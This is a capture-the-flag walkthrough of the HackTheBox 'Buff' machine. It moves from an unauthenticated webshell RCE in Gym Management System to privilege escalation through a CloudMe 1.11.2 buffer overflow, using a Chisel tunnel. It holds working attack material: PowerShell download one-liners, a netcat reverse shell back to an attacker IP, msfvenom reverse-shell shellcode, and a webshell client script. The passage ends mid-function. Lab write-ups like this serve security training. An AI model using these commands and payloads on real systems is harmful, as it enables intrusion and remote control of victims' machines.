Buff

Windows:

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.198

8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.198 

All 1000 scanned ports on 10.10.10.198 are in ignored states.
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.198

7680/tcp open  pando-pub?

8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests

Enumeration: HTTP Port 8080/tcp

Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

http://10.10.10.198:8080/

view-source:http://10.10.10.198:8080/

mrb3n's Bro Hut Made using Gym Management Software 1.0

http://10.10.10.198:8080/index.php

NIKTO:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.198:8080/

+ Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
+ /: Retrieved x-powered-by header: PHP/7.4.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ OpenSSL/1.1.1g appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.4.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.4.43 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /README.md: Readme Found.
+ 9660 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2024-01-14 23:17:54 (GMT-5) (4600 seconds)

GOBUSTER:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.198:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/index.php            (Status: 200) [Size: 4969]
/home.php             (Status: 200) [Size: 143]
/img                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/about.php            (Status: 200) [Size: 5337]
/contact.php          (Status: 200) [Size: 4169]
/register.php         (Status: 200) [Size: 137]
/profile              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]
/feedback.php         (Status: 200) [Size: 4252]
/Home.php             (Status: 200) [Size: 143]
/upload               (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/upload.php           (Status: 200) [Size: 107]
/About.php            (Status: 200) [Size: 5337]
/Contact.php          (Status: 200) [Size: 4169]
/edit.php             (Status: 200) [Size: 4282]
/Index.php            (Status: 200) [Size: 4969]
/license              (Status: 200) [Size: 18025]
/up.php               (Status: 200) [Size: 209]
/packages.php         (Status: 200) [Size: 7791]
/examples             (Status: 503) [Size: 1058]
/include              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]
/licenses             (Status: 403) [Size: 1203]
/facilities.php       (Status: 200) [Size: 5961]
/Register.php         (Status: 200) [Size: 137]
/Profile              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/Profile/]
/LICENSE              (Status: 200) [Size: 18025]
/Feedback.php         (Status: 200) [Size: 4252]
/att                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/att/]
/att.php              (Status: 200) [Size: 816]
/%20                  (Status: 403) [Size: 1044]
/IMG                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/IMG/]
/INDEX.php            (Status: 200) [Size: 4969]
/License              (Status: 200) [Size: 18025]
/ex                   (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/ex/]
/*checkout*           (Status: 403) [Size: 1044]
/*checkout*.php       (Status: 403) [Size: 1044]
/*checkout*.txt       (Status: 403) [Size: 1044]
/Img                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/Img/]
/boot                 (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/boot/]
/Upload               (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/Upload/]
/Upload.php           (Status: 200) [Size: 107]
/phpmyadmin           (Status: 403) [Size: 1203]
/HOME.php             (Status: 200) [Size: 143]
/webalizer            (Status: 403) [Size: 1044]
/*docroot*            (Status: 403) [Size: 1044]
/*docroot*.php        (Status: 403) [Size: 1044]
/*docroot*.txt        (Status: 403) [Size: 1044]
/*.txt                (Status: 403) [Size: 1044]
/*.php                (Status: 403) [Size: 1044]
/*                    (Status: 403) [Size: 1044]
/con.txt              (Status: 403) [Size: 1044]
/con                  (Status: 403) [Size: 1044]
/con.php              (Status: 403) [Size: 1044]
/Packages.php         (Status: 200) [Size: 7791]
/CONTACT.php          (Status: 200) [Size: 4169]
/Edit.php             (Status: 200) [Size: 4282]
/Facilities.php       (Status: 200) [Size: 5961]
/Include              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/Include/]
/http%3A.php          (Status: 403) [Size: 1044]
/http%3A.txt          (Status: 403) [Size: 1044]
/http%3A              (Status: 403) [Size: 1044]
/**http%3a            (Status: 403) [Size: 1044]
/**http%3a.php        (Status: 403) [Size: 1044]
/**http%3a.txt        (Status: 403) [Size: 1044]
/*http%3A.php         (Status: 403) [Size: 1044]
/*http%3A             (Status: 403) [Size: 1044]
/*http%3A.txt         (Status: 403) [Size: 1044]
/UP.php               (Status: 200) [Size: 209]
/aux                  (Status: 403) [Size: 1044]
/aux.txt              (Status: 403) [Size: 1044]
/aux.php              (Status: 403) [Size: 1044]
/Boot                 (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/Boot/]
/ABOUT.php            (Status: 200) [Size: 5337]
/**http%3A.txt        (Status: 403) [Size: 1044]
/**http%3A.php        (Status: 403) [Size: 1044]
/**http%3A            (Status: 403) [Size: 1044]
/%C0.txt              (Status: 403) [Size: 1044]
/%C0.php              (Status: 403) [Size: 1044]
/%C0                  (Status: 403) [Size: 1044]
/Up.php               (Status: 200) [Size: 209]
/FeedBack.php         (Status: 200) [Size: 4252]
/server-status        (Status: 403) [Size: 1203]
/%3FRID%3D2671.txt    (Status: 403) [Size: 1044]
/%3FRID%3D2671        (Status: 403) [Size: 1044]
/%3FRID%3D2671.php    (Status: 403) [Size: 1044]
/devinmoore*.txt      (Status: 403) [Size: 1044]
/devinmoore*.php      (Status: 403) [Size: 1044]
/devinmoore*          (Status: 403) [Size: 1044]
/Ex                   (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/Ex/]

I actually went down a rabbit hole chasing through these things, but there’s a ton of pages. Eventually I realized that given the sheer number of pages, and given things like a license page, this is likely not a custom site for HTB, but some software package.

Gym Management System: When I first solved this, I missed the software name displayed on the site (it is right there in the page source, as shown above). There are two ways to identify it without seeing it stated explicitly, and the third way below is the intended path (simply reading the page); I'll include the other two because they are useful in general:

  1. Every page carries a copyright line and/or link to Projectworlds.in. That site lists many projects in PHP (and other languages), some free, some paid; Gym Management System is among them (number 18 at the time), which fits the theme of this box.

  2. Since this looked like a packaged application rather than a custom site, I checked for a README.md at the web root (Nikto flagged it above), and it returns: "Gym Management System This the my gym management system it is made using PHP,CSS,HTML,Jquery,Twitter Bootstrap. All sql table info can be found in table.sql. more free projects click here - https://projectworlds.in YouTube Demo - https://youtu.be/J_7G_AahgSw"

  3. On /contact.php, the name of the software is stated explicitly.

Exploit: A quick search in searchsploit shows there’s an unauthenticated RCE vulnerability in the software:

┌──(kali💀kali)-[~]
└─$ searchsploit gym management

Gym Management System 1.0 - 'id' SQL Injection                 | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass              | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting        | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execut | php/webapps/48506.py

Shell as shaun

POC Shell: I'll grab a copy of the exploit with searchsploit -m php/webapps/48506.py (and rename it to something more descriptive, like gym_management_rce.py). Reading the script, it bypasses the upload filter to drop a PHP webshell, then runs an infinite loop reading commands from the user, submitting them to the webshell, parsing the response, and printing the result.

It uses print "string" syntax, so it is legacy Python 2. Still, the script works well enough to get a foothold. The stray " PNG" line before each command's output is the PNG magic header the exploit prepends to the webshell file so that the upload passes the image check; the script simply does not strip it from the response:

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 48506.py
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48506.py
┌──(kali💀kali)-[~/Desktop]
└─$ python gym_management_rce.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,                                           
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.

C:\xampp\htdocs\gym\upload> whoami
 PNG
buff\shaun

C:\xampp\htdocs\gym\upload> type \users\shaun\desktop\user.txt
 PNG
0a9e349b4--------------------------------
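
The command loop described above, as an added example of the pattern the exploit script wraps around its webshell (this is not the exploit-db script). The webshell path and the query parameter name are assumptions; substitute the ones your upload actually created. The one thing worth doing better than the original is stripping the image magic bytes, which is where the " PNG" noise in the output above comes from.

```python
"""Minimal webshell client loop: read a command, GET it to the webshell, clean and print the output.

Added example, not the exploit-db script. Webshell URL and parameter name are assumptions.
"""
import urllib.parse
import urllib.request

# Image header prepended to the uploaded PHP file so it passes the upload's image check.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def strip_magic(body, magic=PNG_MAGIC):
    """Drop the leading image magic bytes (the ' PNG' line seen before every result above)."""
    if body.startswith(magic):
        body = body[len(magic):]
    return body.strip()


def run_command(base_url, cmd, param="cmd", timeout=10):
    """GET <base_url>?<param>=<cmd> and return the cleaned output as text. 'cmd' is an assumed parameter name."""
    url = f"{base_url}?{urllib.parse.urlencode({param: cmd})}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return strip_magic(resp.read()).decode(errors="replace")


def shell_loop(base_url):
    """Infinite prompt loop until EOF or 'exit'."""
    while True:
        try:
            cmd = input("webshell> ")
        except EOFError:
            return
        if cmd.strip().lower() in ("exit", "quit"):
            return
        print(run_command(base_url, cmd))


if __name__ == "__main__":
    # Assumed location: the upload directory matches the prompt shown above; the file name is whatever the exploit used.
    shell_loop("http://10.10.10.198:8080/upload/kamehameha.php")
```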

Priv: shaun –> administrator

nc64.exe: This shell gets frustrating after a while, so I upgraded to a proper reverse shell with nc64.exe. I started a Python HTTP server in the directory where I keep nc64.exe, pulled the binary down with PowerShell, and then had it connect back to a netcat listener. Note that I reused port 5555 for both the HTTP server and the listener, so the HTTP server has to be stopped before nc -nlvp 5555 can bind; using two different ports avoids the juggling:

┌──(kali💀kali)-[~/Desktop/6. Web Shells]
└─$ python -m SimpleHTTPServer 5555
C:\xampp\htdocs\gym\upload> powershell -c (new-object net.webclient).downloadfile('http://10.10.16.4:5555/nc64.exe', 'C:\xampp\htdocs\gym\upload\nc64.exe')

C:\xampp\htdocs\gym\upload> dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7
 Directory of C:\xampp\htdocs\gym\upload
15/01/2024  04:10    <DIR>          .
15/01/2024  04:10    <DIR>          ..
15/01/2024  03:38                53 kamehameha.php
15/01/2024  04:10            45,272 nc64.exe
               2 File(s)         45,325 bytes
               2 Dir(s)   8,256,421,888 bytes free
               
C:\xampp\htdocs\gym\upload> nc64.exe 10.10.16.4 5555 -e cmd.exe
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.198] 50443

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
C:\xampp\htdocs\gym\upload> whoami /priv
Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
C:\xampp\htdocs\gym\upload> systeminfo
Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 14:05:58
System Boot Time:          15/01/2024, 02:06:48
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,345 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,375 MB
Virtual Memory: In Use:    2,424 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.198
                                 [02]: fe80::41e5:7a92:6887:70f1
                                 [03]: dead:beef::5115:dce9:e2:32e8
                                 [04]: dead:beef::41e5:7a92:6887:70f1
                                 [05]: dead:beef::c5
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Netstat:

Checking netstat shows two ports listening only on localhost, which nmap could never have seen from outside. 3306 is MySQL, which makes sense for the PHP site on the XAMPP stack. The other is 8888:

C:\Users\shaun\Downloads> netstat -ano | findstr TCP | findstr ":0"
netstat -ano | findstr TCP | findstr ":0"
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6244
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7256
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7572
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       516
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1040
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1492
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2188
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       660
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       672
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       1480
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2840
  TCP    [::]:135               [::]:0                 LISTENING       932
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       7256
  TCP    [::]:8080              [::]:0                 LISTENING       7572
  TCP    [::]:49664             [::]:0                 LISTENING       516
  TCP    [::]:49665             [::]:0                 LISTENING       1040
  TCP    [::]:49666             [::]:0                 LISTENING       1492
  TCP    [::]:49667             [::]:0                 LISTENING       2188
  TCP    [::]:49668             [::]:0                 LISTENING       660
  TCP    [::]:49669             [::]:0                 LISTENING       672
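
The check just done by eye, as an added example (my own code, not part of the original writeup): parse netstat -ano output and report the ports bound only to a loopback address. The sample lines are a subset of the output above plus one constructed IPv6 loopback line to show that case is handled.

```python
"""Pick out loopback-only TCP listeners from `netstat -ano` output.

Added example, not part of the original writeup. SAMPLE_NETSTAT is a subset of the
output above plus one constructed [::1] line.
"""
import re
from collections import namedtuple

Listener = namedtuple("Listener", "proto addr port pid")

SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7572
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       1480
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2840
  TCP    [::]:135               [::]:0                 LISTENING       932
  TCP    [::1]:9999             [::]:0                 LISTENING       4242
"""

# proto, local, remote, optional state (UDP rows have none), pid
_LINE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+"
    r"(?P<local>\S+)\s+"
    r"(?P<remote>\S+)\s+"
    r"(?:(?P<state>\S+)\s+)?"
    r"(?P<pid>\d+)\s*$"
)

LOOPBACK = {"127.0.0.1", "::1"}


def split_addr(local):
    """Split '127.0.0.1:3306' or '[::1]:9999' into (host, port)."""
    host, _, port = local.rpartition(":")
    return host.strip("[]"), int(port)


def parse_listeners(text):
    """Return Listener tuples for every LISTENING row."""
    out = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m or m.group("state") != "LISTENING":
            continue
        host, port = split_addr(m.group("local"))
        out.append(Listener(m.group("proto"), host, port, int(m.group("pid"))))
    return out


def loopback_only(listeners):
    """Map port -> pid for ports bound ONLY to loopback (no wildcard or external bind on the same port).

    These are the privilege-escalation candidates: reachable once you have a foothold, invisible to nmap.
    """
    bound_elsewhere = {l.port for l in listeners if l.addr not in LOOPBACK}
    return {l.port: l.pid for l in listeners if l.addr in LOOPBACK and l.port not in bound_elsewhere}


if __name__ == "__main__":
    for port, pid in sorted(loopback_only(parse_listeners(SAMPLE_NETSTAT)).items()):
        print(f"localhost-only: port {port} pid {pid}")
```

On the real box, feed it the full netstat -ano output; the PID column is what you then look up with tasklist.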

I'll grab the process ID (2840) and findstr for it in the tasklist (the listening process ID changes every minute, so I have to search quickly):

C:\Users\shaun\Downloads>tasklist /v | findstr 2840

If I dig a bit more in shaun’s home directory, there’s an exe in the Downloads folder:

C:\Users\shaun\Downloads>dir
 Directory of C:\Users\shaun\Downloads
14/07/2020  12:27    <DIR>          .
14/07/2020  12:27    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe

Searchsploit:

I’ll throw cloudme into searchsploit and it returns several vulnerabilities:

┌──(kali💀kali)-[~]
└─$ searchsploit cloudme

CloudMe 1.11.2 - Buffer Overflow (PoC)                         | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)               | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)        | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                    | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)       | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                        | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)     | windows_x86-64/remote/44784.py

The version number for the top two (1.11.2) lines up nicely with the EXE name from Buff (CloudMe_1112.exe).

Tunnel:

The EXE name gives the version (1.11.2), and the top searchsploit hit, https://www.exploit-db.com/exploits/48389, is a Python proof of concept for exactly that version.

There is one hurdle first. CloudMe listens only on 127.0.0.1:8888 (see the netstat output above), and Python is not normally installed on Windows, so I can't simply run the script on Buff. Instead I'll run it from my attacking machine and use Chisel to forward a port on Kali through to localhost:8888 on the target.

So, let's get the exploit cleaned up and ready to execute, and then transfer over Chisel to set up the tunnel.

Shell: Chisel

Chisel is my favorite tool for situations like this, because it runs on both Windows and Linux, doesn't require SSH access, and is straightforward to use.

First I need to copy Chisel over to Buff. I'll use a PowerShell download one-liner similar to the one I used for netcat.

Grab the release binaries from the chisel GitHub releases page (one for Linux, one for Windows), gunzip both, and make the Linux one executable with chmod +x (the Windows binary does not need it):

┌──(kali💀kali)-[~/Desktop]
└─$ gunzip chisel_1.9.0_linux_amd64.gz
                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ gunzip chisel_1.9.0_windows_amd64.gz

                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ chmod +x chisel_1.9.0_linux_amd64
                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ chmod +x chisel_1.9.0_windows_amd64

Now keep the Linux version of chisel on Kali and transfer the Windows version to the target as chisel.exe:

┌──(kali💀kali)-[~/go/bin]
└─$ python -m SimpleHTTPServer 5555
powershell -c iwr http://10.10.16.4:5555/chisel_1.9.0_windows_amd64 -outfile chisel.exe

PORT FORWARDING USING CHISEL:

Now I’ll run the Linux binary on Kali in server mode:

┌──(kali💀kali)-[~/Desktop]
└─$ ./chisel_1.9.0_linux_amd64 server -p 8000 --reverse
2024/01/15 02:36:00 server: Reverse tunnelling enabled
2024/01/15 02:36:00 server: Fingerprint ZdV6tKlWiB6RWaNi3jhlpMTt8mgew8BuN1fNu4LtyCA=
2024/01/15 02:36:00 server: Listening on http://0.0.0.0:8000

Next, from Buff, I'll run the client and ask the server for a reverse port: R:8888:localhost:8888 makes Kali listen on 8888 and forward every connection through the tunnel to localhost:8888 on Buff, which is where CloudMe is listening:

PS C:\Users\shaun\Downloads> ./chisel.exe client 10.10.16.4:8000 R:8888:localhost:8888

I can see my local box is listening on 8888:

┌──(kali💀kali)-[~]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8888                 :::*                    LISTEN      153024/./chisel_1.9 
tcp6       0      0 :::8000                 :::*                    LISTEN      153024/./chisel_1.9 

Modifying The Exploit

This is a pretty straightforward buffer overflow exploit which only needs light updating. The shellcode in the script pops calc.exe; I want a reverse shell back to my box instead, so I'll generate replacement shellcode with msfvenom.

The payload in the script looks to be the output of msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python. Given the four-byte addresses and references to ESP and EIP (rather than RSP and RIP), CloudMe is a 32-bit process, so the replacement must be x86 as well:

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=2560 -b '\x00\x0A\x0D' -f python -v payload

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload =  b""
payload += b"\xdb\xc2\xbd\x3c\x18\x85\x99\xd9\x74\x24\xf4"
payload += b"\x58\x29\xc9\xb1\x52\x31\x68\x17\x83\xc0\x04"
payload += b"\x03\x54\x0b\x67\x6c\x58\xc3\xe5\x8f\xa0\x14"
payload += b"\x8a\x06\x45\x25\x8a\x7d\x0e\x16\x3a\xf5\x42"
payload += b"\x9b\xb1\x5b\x76\x28\xb7\x73\x79\x99\x72\xa2"
payload += b"\xb4\x1a\x2e\x96\xd7\x98\x2d\xcb\x37\xa0\xfd"
payload += b"\x1e\x36\xe5\xe0\xd3\x6a\xbe\x6f\x41\x9a\xcb"
payload += b"\x3a\x5a\x11\x87\xab\xda\xc6\x50\xcd\xcb\x59"
payload += b"\xea\x94\xcb\x58\x3f\xad\x45\x42\x5c\x88\x1c"
payload += b"\xf9\x96\x66\x9f\x2b\xe7\x87\x0c\x12\xc7\x75"
payload += b"\x4c\x53\xe0\x65\x3b\xad\x12\x1b\x3c\x6a\x68"
payload += b"\xc7\xc9\x68\xca\x8c\x6a\x54\xea\x41\xec\x1f"
payload += b"\xe0\x2e\x7a\x47\xe5\xb1\xaf\xfc\x11\x39\x4e"
payload += b"\xd2\x93\x79\x75\xf6\xf8\xda\x14\xaf\xa4\x8d"
payload += b"\x29\xaf\x06\x71\x8c\xa4\xab\x66\xbd\xe7\xa3"
payload += b"\x4b\x8c\x17\x34\xc4\x87\x64\x06\x4b\x3c\xe2"
payload += b"\x2a\x04\x9a\xf5\x4d\x3f\x5a\x69\xb0\xc0\x9b"
payload += b"\xa0\x77\x94\xcb\xda\x5e\x95\x87\x1a\x5e\x40"
payload += b"\x07\x4a\xf0\x3b\xe8\x3a\xb0\xeb\x80\x50\x3f"
payload += b"\xd3\xb1\x5b\x95\x7c\x5b\xa6\x7e\x89\x96\xb8"
payload += b"\x7a\xe5\xa4\xb8\x88\xf5\x21\x5e\xe6\xe5\x67"
payload += b"\xc9\x9f\x9c\x2d\x81\x3e\x60\xf8\xec\x01\xea"
payload += b"\x0f\x11\xcf\x1b\x65\x01\xb8\xeb\x30\x7b\x6f"
payload += b"\xf3\xee\x13\xf3\x66\x75\xe3\x7a\x9b\x22\xb4"
payload += b"\x2b\x6d\x3b\x50\xc6\xd4\x95\x46\x1b\x80\xde"
payload += b"\xc2\xc0\x71\xe0\xcb\x85\xce\xc6\xdb\x53\xce"
payload += b"\x42\x8f\x0b\x99\x1c\x79\xea\x73\xef\xd3\xa4"
payload += b"\x28\xb9\xb3\x31\x03\x7a\xc5\x3d\x4e\x0c\x29"
payload += b"\x8f\x27\x49\x56\x20\xa0\x5d\x2f\x5c\x50\xa1"
payload += b"\xfa\xe4\x60\xe8\xa6\x4d\xe9\xb5\x33\xcc\x74"
payload += b"\x46\xee\x13\x81\xc5\x1a\xec\x76\xd5\x6f\xe9"
payload += b"\x33\x51\x9c\x83\x2c\x34\xa2\x30\x4c\x1d"

I changed the payload type (adding the LHOST and LPORT this payload needs) and used -v payload to name the output variable so I can paste it straight over the existing one in the script. The flags:

  - -a: architecture (x86, matching the 32-bit target)
  - -p: payload (a staged-less reverse shell; the listener is plain nc)
  - -b: bad characters (taken from the exploit, no need to fuzz them myself; the same set the original script's shellcode was generated with)
  - -f: output format (python)
  - -v: variable name

After replacing the shellcode in the exploit, that should be the only change needed. One thing to confirm before firing: the encoded shellcode is 351 bytes, so it must still fit in the space the script leaves after the return address, or the overflow will land short of the jump.
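
The structure being patched above (junk up to EIP, a 32-bit return address, NOP sled, shellcode), as an added example of how I assemble and sanity-check such a payload before pushing it through the tunnel. This is my own code, not 48389.py; the OFFSET and JMP_ESP values are placeholders (assumptions) and the real ones must be copied from the script you are patching, as must the msfvenom payload bytes.

```python
"""Assemble a classic stack-overflow payload and reject it if any bad byte slipped in.

Added example, not the exploit-db script. OFFSET / JMP_ESP below are placeholders.
"""
import socket
import struct

# The set the exploit (and the msfvenom -b flag above) excludes.
BAD_CHARS = b"\x00\x0a\x0d"


def check_bad_chars(blob, bad=BAD_CHARS):
    """Return [(index, byte), ...] for every bad byte found in blob (empty list if clean)."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def build_payload(offset, ret_addr, shellcode, nops=16, bad=BAD_CHARS):
    """offset: bytes written before EIP is overwritten; ret_addr: address of a JMP ESP gadget.

    The return address is packed little-endian as a 32-bit value (x86). Raises ValueError
    if the packed address or the shellcode contains a bad byte, since either would truncate
    or corrupt the overflow.
    """
    ret = struct.pack("<I", ret_addr)
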